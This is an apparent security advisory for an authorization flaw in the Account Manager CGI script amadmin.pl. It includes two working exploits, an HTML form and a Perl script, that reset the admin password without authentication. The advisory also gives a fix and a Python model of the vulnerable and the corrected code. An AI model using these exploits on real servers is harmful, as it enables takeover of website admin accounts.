Vulnerability: Account Manager CGI (amadmin.pl)

Affected: all versions, including LITE and PRO. ENTERPRISE has not been tested.

Description

'n30' found the following. The script lets any remote user into the Administration Control Panel by overwriting the admin password with one of their own choosing. This is possible because amadmin.pl acts on the submitted form data without first checking whether the caller is authenticated as an admin. A POST to www.server.com/cgi-bin/amadmin.pl carrying the setpwd action (the pwd and pwd2 fields plus the setpwd submit field) from an unauthenticated client is therefore enough to replace the password. With admin access, a remote user can add and remove users in the protected areas of your website and, from there, perhaps reach other, more interesting CGIs.

Here comes the exploit. It is a plain HTML form; to use it, change the ACTION to point at amadmin.pl on the target server:

<FORM ACTION="http://www.decodeco.com/cgi-bin/acctman/amadmin.pl" METHOD="POST">
<CENTER><BR>
<TABLE BORDER="0" WIDTH="450"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD COLSTART="1">
<P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#400000">Account Manager LITE/PRO</FONT>: Password Exploit!</FONT></B></P>
<CENTER><P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#400000">n30</FONT></FONT></B></P></CENTER>
<P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter your password twice. Once to set it, and once to confirm it.</FONT></P>
<CENTER><TABLE BORDER="0"><TBODY><COLDEFS><COLDEF><COLDEF></COLDEFS><ROWS>
<TR><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd"></TD><TD COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD></TR>
<TR><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD><TD COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD></TR>
<TR><TD ALIGN="CENTER" COLSTART="1"><BR><INPUT TYPE="SUBMIT" NAME="setpwd" VALUE=" Set Password "></TD><TD COLSTART="2"><BR></TD></TR>
</ROWS></TBODY></TABLE></CENTER>
<CENTER><TABLE BORDER="0" WIDTH="400"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS>
<TR><TD COLSTART="1"><HR SIZE="1"></TD></TR>
<TR><TD ALIGN="CENTER" COLSTART="1"><FONT SIZE="-2" FACE="verdana, arial, helvetica"><B>Account Manager LITE/PRO Admin Password Exploit</B></FONT></TD></TR>
</ROWS></TBODY></TABLE></CENTER>
</TD></TR></ROWS></TBODY></TABLE></CENTER>
<CENTER><FONT SIZE="1" FACE="verdana, arial, helvetica"><B><BR>To Use Modify Source To Point to amadmin.pl on TARGET Server<BR><BR><a href="mailto:n30@alldas.de">mail-me</a></B></FONT></CENTER>
</FORM>
<!-- Shoutz to trib, axess and all who know me! -->

Here is another, a Perl script that sends the same POST directly:

#!/usr/bin/perl -w
## Account Manager LITE 1.0x / cgi.elitehost.com
## This exploit lets you change the administrator
## password, and completely take control.
##
## teleh0r@doglover.com / anno 2000
## http://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 2) {
    print("Usage: $0 <target> <newpass>\n");
    exit(1);
}

my ($target, $newpass) = @ARGV;

# Note that the path may have to be changed to match the target install.
my $path  = "/cgi-bin/amlite/amadmin.pl";
my $crypt = crypt($newpass, 'aa');   # what the stored hash will look like with salt 'aa'
my $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The fields the admin form submits: the new password twice plus the
# setpwd submit button. Content-length is taken from the body itself
# (the password appears twice, so a fixed 34 + length($newpass) is short).
my $command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
my $length  = length($command);

print("\nRemote host: $target\n");
print("CGI-script: $path\n");
print("New password: $newpass / $crypt\n\n");

my $sploit = "POST $path HTTP/1.0\r\n"
           . "Connection: close\r\n"
           . "User-Agent: $agent\r\n"
           . "Host: $target\r\n"
           . "Content-type: application/x-www-form-urlencoded\r\n"
           . "Content-length: $length\r\n"
           . "\r\n"
           . $command;

my $iaddr = inet_aton($target)      || die("Error: $!\n");
my $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
my $proto = getprotobyname('tcp')   || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr)                      || die("Error: $!\n");
send(SOCKET, "$sploit\015\012", 0)           || die("Error: $!\n");
close(SOCKET);

sleep(2);
print("Surf to http://$target$path\n");
exit(0);

Solution

A fix is already available; see the vendor website, the download version is patched. Note that the flaw is a missing authorization check, not a weak password, so changing the admin password on an unpatched install does not help: upgrade, and treat any unexplained POST to amadmin.pl in your web server access logs as a possible compromise of the admin account.
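The missing check described above, modelled end to end as an added example for this page (this is not Account Manager's code and not either exploit author's). The client side builds the same POST the two exploits send, with Content-Length derived from the encoded body; the server side is a stand-in for the CGI dispatcher, once as the advisory describes it (the setpwd action honoured for any caller) and once with the admin check placed in front of the dispatch. The field names pwd/pwd2/setpwd and the /cgi-bin/amlite/amadmin.pl path come from the page; the admin_session flag, the AdminStore class and its hash format, and the host www.example.com are assumptions made for the example.

```python
"""Model of the amadmin.pl setpwd authorization bug, end to end.

Added example for this page, not Account Manager's code.  The client side
builds the same POST the exploits above send; the server side is a
stand-in for the CGI dispatcher, once as the advisory describes it
(setpwd honoured for anyone) and once with the admin check in front.
Field names pwd/pwd2/setpwd and the path come from the page; the
session flag, the password store and its hash format are assumptions.
"""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

AMADMIN_PATH = "/cgi-bin/amlite/amadmin.pl"   # path used by the Perl exploit


def build_setpwd_request(host: str, new_password: str, path: str = AMADMIN_PATH) -> bytes:
    """Raw HTTP/1.0 POST equivalent to the Perl exploit's, with the body
    URL-encoded and Content-Length derived from the encoded body.  The
    password appears twice, so a fixed 34 + len(password) under-counts
    by len(password)."""
    body = urlencode({"pwd": new_password, "pwd2": new_password,
                      "setpwd": "  Set Password  "}).encode()
    head = (f"POST {path} HTTP/1.0\r\n"
            f"Host: {host}\r\n"
            "Connection: close\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode() + body


def parse_form_body(raw: bytes) -> dict:
    """Server side: read exactly Content-Length bytes of body and decode
    the form fields, as a CGI would see them on STDIN."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return {k: v[0] for k, v in parse_qs(rest[:length].decode()).items()}


class AdminStore:
    """Stands in for the password file amadmin.pl rewrites (hash format assumed)."""

    def __init__(self, password: str) -> None:
        self.salt = secrets.token_bytes(16)
        self.digest = self._hash(password)

    def _hash(self, password: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 50_000)

    def verify(self, password: str) -> bool:
        return hmac.compare_digest(self.digest, self._hash(password))

    def set_password(self, password: str) -> None:
        self.digest = self._hash(password)


def _apply_setpwd(store: AdminStore, fields: dict) -> int:
    """The action itself; both dispatchers share it, only the gate differs."""
    if fields.get("pwd") and fields["pwd"] == fields.get("pwd2"):
        store.set_password(fields["pwd"])
        return 200
    return 400


def vulnerable_dispatch(store: AdminStore, fields: dict, admin_session: bool) -> int:
    """The pattern the advisory describes: the action is chosen from the
    submitted fields alone; admin_session is never consulted."""
    if "setpwd" in fields:
        return _apply_setpwd(store, fields)
    return 200                      # any other request: show the panel


def fixed_dispatch(store: AdminStore, fields: dict, admin_session: bool) -> int:
    """Authorize before looking at any field, so no action is reachable
    without an admin session."""
    if not admin_session:
        return 403
    if "setpwd" in fields:
        return _apply_setpwd(store, fields)
    return 200


def demo(old_password: str = "correct-horse", new_password: str = "owned") -> dict:
    """Replay the exploit request against both dispatchers with no session."""
    fields = parse_form_body(build_setpwd_request("www.example.com", new_password))
    vuln, fixed = AdminStore(old_password), AdminStore(old_password)
    return {
        "vulnerable_status": vulnerable_dispatch(vuln, fields, admin_session=False),
        "vulnerable_now_owned": vuln.verify(new_password),
        "fixed_status": fixed_dispatch(fixed, fields, admin_session=False),
        "fixed_now_owned": fixed.verify(new_password),
        "fixed_old_still_valid": fixed.verify(old_password),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of placing the check at the top of fixed_dispatch rather than inside the setpwd branch is that every future action added to the script inherits it; the original bug is exactly what happens when each action is expected to remember to check for itself.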